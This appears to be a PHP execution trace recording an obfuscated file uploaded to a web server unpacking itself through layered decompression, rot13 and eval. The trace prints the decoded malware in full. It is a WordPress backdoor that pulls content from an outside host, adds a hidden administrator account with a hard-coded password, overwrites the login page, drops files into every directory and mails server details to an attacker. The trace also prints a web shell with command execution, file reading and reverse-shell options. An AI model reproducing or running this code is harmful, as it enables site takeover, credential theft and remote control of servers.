3 9 R 'x�\001�\0317�\001�\031<�x�\001�\031G�\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n'
3 10 0 0.000784 422128 gzuncompress 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 'x�\001�\0317�\001�\031<�x�\001�\031G�\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n'
3 10 1 0.000959 430352
3 10 R '\001�\031<�x�\001�\031G�\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc�'
3 11 0 0.001130 418032 gzinflate 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 '\001�\031<�x�\001�\031G�\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc�'
3 11 1 0.001297 426256
3 11 R 'x�\001�\031G�\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001'
3 12 0 0.001466 418032 gzuncompress 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 'x�\001�\031G�\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001'
3 12 1 0.001634 426256
3 12 R '\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\03'
3 13 0 0.001820 418032 gzinflate 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 '\001�\031L�x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\03'
3 13 1 0.001996 426256
3 13 R 'x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035'
3 14 0 0.002165 418032 gzuncompress 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 'x�\001�\031W�\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035'
3 14 1 0.002336 426256
3 14 R '\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035���k����~:>�'
3 15 0 0.002504 418032 gzinflate 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 '\001�\031\\�x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035���k����~:>�'
3 15 1 0.002669 426256
3 15 R 'x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035���k����~:>ޜ�|\000N\003'
3 16 0 0.002836 418032 gzuncompress 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 'x�\001�\031g��<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035���k����~:>ޜ�|\000N\003'
3 16 1 0.003002 426256
3 16 R '�<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035���k����~:>ޜ�|\000N\003�f�\033x<�#ߣ'
3 17 0 0.003168 418032 gzinflate 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 '�<�v�F���9��\016�1H\017\t��<�\022cQ#ғ��5�D��<\000\006\000E) �$\021\001�?j_�\av?l���q#(Q\036�3{v�D"�����UՍFo�`��\027߬\a�d\030s�\0338��\035�>��d��v�=zy��\037�w�}�]D\036LÈC� tL?����d0�"��\036\004��\023$ل�pZA�\001�\t]ϭ�)\031zcd�#�\017\f\020J�V_|s�\030{�\r�b�9��\001g\017vi\v�\034�\0264~�ˁ�\004�\016��7\000�XCӫ��7vd\005��7�\032+ѮZU�}�+6S˩���\031[\017�%Y���?V\005��({���n\030\r�\037�z�\034�\032\024�\r�W�� ��_n��d���\v6KAc��wI�\'�\001��4�ٮз�\030��8�~�\035���k����~:>ޜ�|\000N\003�f�\033x<�#ߣ'
3 17 1 0.003411 446736
3 17 R '<?cuc\r\n$qbphzrag_ebbg = $_FREIRE["QBPHZRAG_EBBG"];\r\n$qbphzrag_ebbg_svyr = qveanzr(__SVYR__);\r\n$jc_qrgrpg = 0;\r\nvs(svyr_rkvfgf($qbphzrag_ebbg.\'/jc-ybnq.cuc\'))\r\n{ \r\n vapyhqr $qbphzrag_ebbg.\'/jc-ybnq.cuc\';\r\n $jc_qrgrpg = 1;\r\n}ryfr\r\n{\r\n $cersvk = pbhag(@rkcybqr(\'/\', $qbphzrag_ebbg_svyr));\r\n $n = \'\';\r\n sbe($v = 0; $v<$cersvk; $v++)\r\n {\r\n $n = $n.\'../\';\r\n vs(svyr_rkvfgf($qbphzrag_ebbg_svyr.\'/\'.$n.\'jc-ybnq.cuc\'))\r\n {\r\n vapy'
3 18 0 0.003497 438512 str_rot13 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 '<?cuc\r\n$qbphzrag_ebbg = $_FREIRE["QBPHZRAG_EBBG"];\r\n$qbphzrag_ebbg_svyr = qveanzr(__SVYR__);\r\n$jc_qrgrpg = 0;\r\nvs(svyr_rkvfgf($qbphzrag_ebbg.\'/jc-ybnq.cuc\'))\r\n{ \r\n vapyhqr $qbphzrag_ebbg.\'/jc-ybnq.cuc\';\r\n $jc_qrgrpg = 1;\r\n}ryfr\r\n{\r\n $cersvk = pbhag(@rkcybqr(\'/\', $qbphzrag_ebbg_svyr));\r\n $n = \'\';\r\n sbe($v = 0; $v<$cersvk; $v++)\r\n {\r\n $n = $n.\'../\';\r\n vs(svyr_rkvfgf($qbphzrag_ebbg_svyr.\'/\'.$n.\'jc-ybnq.cuc\'))\r\n {\r\n vapy'
3 18 1 0.003593 467216
3 18 R '<?php\r\n$document_root = $_SERVER["DOCUMENT_ROOT"];\r\n$document_root_file = dirname(__FILE__);\r\n$wp_detect = 0;\r\nif(file_exists($document_root.\'/wp-load.php\'))\r\n{ \r\n include $document_root.\'/wp-load.php\';\r\n $wp_detect = 1;\r\n}else\r\n{\r\n $prefix = count(@explode(\'/\', $document_root_file));\r\n $a = \'\';\r\n for($i = 0; $i<$prefix; $i++)\r\n {\r\n $a = $a.\'../\';\r\n if(file_exists($document_root_file.\'/\'.$a.\'wp-load.php\'))\r\n {\r\n incl'
3 19 0 0.004295 575728 eval 1 '?><?php\r\n$document_root = $_SERVER["DOCUMENT_ROOT"];\r\n$document_root_file = dirname(__FILE__);\r\n$wp_detect = 0;\r\nif(file_exists($document_root.\'/wp-load.php\'))\r\n{ \r\n include $document_root.\'/wp-load.php\';\r\n $wp_detect = 1;\r\n}else\r\n{\r\n $prefix = count(@explode(\'/\', $document_root_file));\r\n $a = \'\';\r\n for($i = 0; $i<$prefix; $i++)\r\n {\r\n $a = $a.\'../\';\r\n if(file_exists($document_root_file.\'/\'.$a.\'wp-load.php\'))\r\n {\r\n include $document_root_file.\'/\'.$a.\'wp-load.php\';\r\n $wp_detect = 1;\r\n break;\r\n }\r\n }\r\n}\r\n\r\nif($wp_detect == 1)\r\n{\r\n //Header Yazdırma\r\n $wp_theme_dir = get_template_directory();\r\n $header_file = $wp_theme_dir.\'/headers.php\';\r\n $header_content = file_get_contents($header_file);\r\n $append = http_get(\'https://wordpres.page/txt/lamer.txt\');\r\n if(!preg_match(\'#\'.$append.\'#\', $header_content))\r\n { \r\n\t $new_content = $append.$header_content;\r\n\t $open_file = fopen($header_file, \'w\');\r\n\t fwrite($open_file, $new_content);\r\n\t fclose($open_file);\r\n }\r\n //Header Yazdırma \r\n \r\n // shell Ekleme\r\n $user = \'new_admin\';\r\n $pass = \'Mzj2zr542CwkB#7QDsX^RK@fe@mxBTVAHp\';\r\n $email = \'byhero44@gmail.com\';\r\n if (!username_exists( $user ) && !email_exists( $email ) ) {\r\n $user_id = wp_create_user( $user, $pass, $email );\r\n $user = new WP_User( $user_id );\r\n $user->set_role( \'administrator\' );\r\n } \r\n // shell Ekleme\r\n \r\n // Wp Login Yazma.\r\n $wp_login = ABSPATH.\'/wp-login.php\';\r\n $login = http_get(\'https://wordpres.page/txt/seo.txt\');\r\n $open_login = fopen($wp_login, \'w\');\r\n fwrite($open_login, $login);\r\n fclose($open_login);\r\n // Wp Login Yazma.\r\n}\r\n\r\n\r\n// Shell Yazma\r\n$code = http_get(\'#\');\r\n$wp_code = $document_root.\'/#\';\r\n$open_code = fopen($wp_code, \'w\');\r\nfwrite($open_code, $code);\r\nfclose($open_code);\r\n// Shell Yazma\r\n\r\n// Makale Yazma\r\n$makale = http_get(\'\');\r\n$wp_makale = $document_root.\'/\';\r\n$open_makale = fopen($wp_makale, \'w\');\r\nfwrite($open_makale, $makale);\r\nfclose($open_makale);\r\n// Makale Yazma\r\n\r\n\r\n// Klasörlere Yazma\r\n$directories = expandDirectories($document_root);\r\n$css = http_get(\'https://wordpres.page/txt/lamer.txt\');\r\nforeach($directories as $dir)\r\n{\r\n\tif(!preg_match(\'#wp-content#\', $dir))\r\n\t{\r\n\t $css_file = $dir.\'/wp-indos.php\';\r\n\t $open_css = fopen($css_file, \'w\');\r\n\t fwrite($open_css, $css);\r\n\t fclose($open_css);\r\n }\r\n}\r\n// Klasörlere Yazma\r\n\r\nfunction expandDirectories($base_dir) {\r\n $directories = array();\r\n foreach(scandir($base_dir) as $file) {\r\n if($file == \'.\' || $file == \'..\') continue;\r\n $dir = $base_dir.DIRECTORY_SEPARATOR.$file;\r\n if(is_dir($dir)) {\r\n $directories []= $dir;\r\n $directories = array_merge($directories, expandDirectories($dir));\r\n }\r\n }\r\n return $directories;\r\n}\r\nfunction http_get($url)\r\n{\r\n\t$im = curl_init($url);\r\n\tcurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\n\tcurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\n\tcurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\n\tcurl_setopt($im, CURLOPT_HEADER, 0);\r\n\treturn curl_exec($im);\r\n\tcurl_close($im);\r\n}\r\n?><?php\r\n$kime = "byhero44@gmail.com";\r\n$baslik = "wsoff 2023";\r\n$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\\r\\n";\r\nmail($kime, $baslik, $EL_MuHaMMeD);\r\n?><?php\r\n\t//by ghostlulz\r\n\t// beggining of HTML doc\r\n\tfunction headhtml()\r\n\t{\r\n\t\techo "<html>";\r\n\t\techo "<head>";\r\n\r\n\t\t//CSS\r\n\t\techo "<style>";\r\n\t\techo "body {background-color:#1A1A1D;color:white; font-size:20px;}";\r\n\t\techo "input[type=text], select {width: 60%;padding: 12px 20px;font-size:20px;border-color:#470B0B; background-color:#C3BFB5}";\r\n\t\techo "input[type=submit] {width: 10%;padding: 12px 20px;background-color:#470B0B;color:#C3BFB5;font-size:20px;border-color:#470B0B;}";\r\n\t\techo "table{width:100%;}";\r\n\t\techo "td,th {border: 1px solid transparent; padding:10px;}";\r\n\t\techo "td {text-align:center;}";\r\n\t\techo "tr:nth-child(even) td { background: #470B0B; } ";\r\n\t\techo "a {color:white;}";\r\n\t\techo "#container {width:85%;float:right;padding-bottom:150px;}"; //padding bottem = footer hight\r\n\t\techo "ul {list-style-type: none;margin: 0;padding: 0;overflow: hidden;}";\r\n\t\techo "li {float: left;}";\r\n\t\techo "li a {display: block;color: white;text-align: center;padding: 14px 16px;text-decoration: none;}";\r\n\t\techo "li a:hover {background-color: #282828;}";\r\n\t\techo ".active:hover {background-color: #470B0B;}";\r\n\t\techo ".active {background-color: #470B0B;}";\r\n\t\techo "td a{color:#97caf9;}";\r\n\t\techo "th {color:#FFC04C;}";\r\n\t\techo "#command {background-color:#C3BFB5;color:black;width:60%;padding-top:30px;padding-bottom:30px;padding-left:10px;}";\r\n\t\techo "#fleftReverseShell {float:right;padding-right:5%;}";\r\n\t\techo "footer {clear:both;background-color:black;font-size:11px;padding-left:5px;position:fixed;bottom:0;width:100%;height:150px;}";\r\n\t\techo "#center {text-align:center;}";\r\n\t\techo "</style>";\r\n\r\n\t\techo "</head>";\r\n\t\techo "<body>";\r\n\r\n\t\t//Nav bar\r\n\t\techo "<ul>";\r\n\t\techo "<li><a class=\'active\' href=\'?\'>Home</a></li>";\r\n\t\techo "<li><a href=\'?console=1\'>Console</a></li>";\r\n\t\techo "<li><a href=\'?reverse-shell=1\'>Reverse Shell</a></li>";\r\n\t\techo "<li><a href=\'?database=1\'>Databases</a></li>";\r\n\t\techo "</ul>";\r\n\t\techo "<br>";\r\n\t\techo "<br>";\r\n\r\n\t\t// container for content\r\n\t\techo "<div id=\'container\'>";\r\n\t}\r\n\r\n\t// ending of HTML doc\r\n\tfunction foothtml()\r\n\t{\r\n\t\t//closing tags\r\n\t\techo "</div>";\r\n\t\techo "</body>";\r\n\t\techo "<footer>";\r\n\t\techo "<br>";\r\n\t\techo "<p id=\'center\'>By: <font color=\'red\'>MuricaSpi</font> AKA <font color=\'blue\'>Ghostlulz</font></p>";\r\n\t\techo "<p id=\'center\'><a href=\'?\'>Home</a> <a href=\'?console=1\'>Console</a> <a href=\'?reverse-shell=1\'>Reverse Shell</a> <a href=\'#Databases\'>Databases</a></p>";\r\n\t\techo "<br>";\r\n\t\techo "<p>*NOT FOR ILLEGAL USE*</p>";\r\n\t\techo "<p>I am not resposible for what you do with this product.</p>";\r\n\r\n\t\techo "</footer>";\r\n\t\techo "</html>";\r\n\t}\r\n\r\n\t//folder form\r\n\tfunction displayFolderForm()\r\n\t{\r\n\r\n\t\techo \'<form action="">\';\r\n\r\n\t\techo \'<label>Switch Directory:</label><br>\';\r\n\t\techo \'<input type="text" name="directory" placeholder="/var/www/html/">\';\r\n\t\techo \'<input type="submit" value="Submit">\';\r\n\t\techo \'</form>\';\r\n\t\techo \'<br>\';\r\n\t\t\r\n\r\n\t\techo \'<form action="">\';\r\n\t\techo \'<label>Read File:</label><br>\';\r\n\t\techo \'<input type="text" name="displayfile" placeholder="/etc/passwd">\';\r\n\t\techo \'<input type="submit" value="Submit">\';\r\n\t\techo \'</form>\';\r\n\t}\r\n\r\n\t//console form\r\n\tfunction displayConsoleForm()\r\n\t{\r\n\t\techo \'<form action="">\';\r\n\r\n\t\techo \'<label>Os Commands</label><br>\';\r\n\t\techo \'<input type="hidden" name="console" value="1">\';\r\n\t\techo \'<select name="command">\';\r\n\r\n\t\techo \'<optgroup label="Distribution Type / Version">\';\r\n \techo \'<option value="cat /etc/issue">cat /etc/issue</option>\';\r\n \techo \'<option value="cat /etc/*-release">cat /etc/*-release</option>\';\r\n \techo \'<option value="cat /etc/lsb-release">cat /etc/lsb-release (Debian)</option>\';\r\n \techo \'<option value="cat /etc/redhat-release">cat /etc/redhat-release (Redhat)</option>\';\r\n \techo \'</optgroup>\';\r\n\r\n \techo \'<optgroup label="Kernel Version">\';\r\n \techo \'<option value="uname -ar">cat uname -ar</option>\';\r\n \techo \'</optgroup>\';\r\n\r\n \techo \'<optgroup label="File System Info">\';\r\n \techo \'<option value="df -h">df -h</option>\';\r\n \techo \'</optgroup>\';\r\n \techo \'</select>\';\r\n\r\n\t\techo \'<input type="submit" value="Submit">\';\r\n\t\techo \'</form>\';\r\n\r\n\r\n\t\techo \'<form action="">\';\r\n\r\n\t\techo \'<label>Custom Os Commands</label><br>\';\r\n\t\techo \'<input type="hidden" name="console" value="1">\';\r\n\t\techo \'<input type="text" name="command" placeholder="cat /etc/passwd">\';\r\n\t\techo \'<input type="submit" value="Submit">\';\r\n\t\techo \'</form>\';\r\n\t}\r\n\r\n\t//reverse shell form\r\n\tfunction displayReverseShellForm()\r\n\t{\r\n\t\t// check if programs are installed\r\n\t\t$Netcat = exec("which nc");\r\n\t\t$Bash = exec("which bash");\r\n\t\t$SH = exec("which sh");\r\n\t\t$Python = exec("which python");\r\n\t\t$Ruby = exec("which ruby");\r\n\t\t$Php = exec("which php");\r\n\t\t$Perl = exec("which perl");\r\n\t\t$Java = exec("which java");\r\n\r\n\t\techo "<div id=\'fleftReverseShell\'>";\r\n\t\techo "<h4> Installed Applications</h4>";\r\n\r\n\t\t// If not installed string will be empty \r\n\t\tif($Netcat === \'\')\r\n\t\t{\r\n\t\t\techo \'Netcat - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Netcat - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Bash === \'\')\r\n\t\t{\r\n\t\t\techo \'Bash - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Bash Shell- <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Sh === \'\')\r\n\t\t{\r\n\t\t\techo \'SH Shell- <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'SH Shell - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Python === \'\')\r\n\t\t{\r\n\t\t\techo \'Python - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Python - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Ruby === \'\')\r\n\t\t{\r\n\t\t\techo \'Ruby - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Ruby - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Php === \'\')\r\n\t\t{\r\n\t\t\techo \'PHP - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'PHP - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Perl === \'\')\r\n\t\t{\r\n\t\t\techo \'Perl - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Perl - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\r\n\t\tif($Java === \'\')\r\n\t\t{\r\n\t\t\techo \'Java - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Java - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\t\r\n\t\techo "</div>";\r\n\r\n\r\n\t\techo \'<form action="">\';\r\n\r\n\t\techo \'<label>IP Address</label><br>\';\r\n\t\techo \'<input type="text" name="ip" placeholder="10.0.0.23"><br><br>\';\r\n\r\n\t\techo \'<label>Remote Port</label><br>\';\r\n\t\techo \'<input type="text" name="port" placeholder="4444"> <br><br>\';\r\n\r\n\t\techo \'<label>Option</label><br>\';\r\n\t\techo \'<input type="hidden" name="reverse-shell" value="1">\';\r\n\r\n\t\techo \'<select name="option">\';\r\n\t\techo \'<optgroup label="Netcat">\';\r\n \techo \'<option value="Netcat-/bin/sh">Netcat /bin/sh</option>\';\r\n \techo \'<option value="Netcat-/bin/sh-pipes">Netcat /bin/sh (Using Pipes)</option>\';\r\n \techo \'<option value="Netcat-/bin/bash">Netcat /bin/bash</option>\';\r\n \techo \'<option value="Netcat-/bin/bash-pipes">Netcat /bin/bash (Using Pipes)</option>\';\r\n \techo 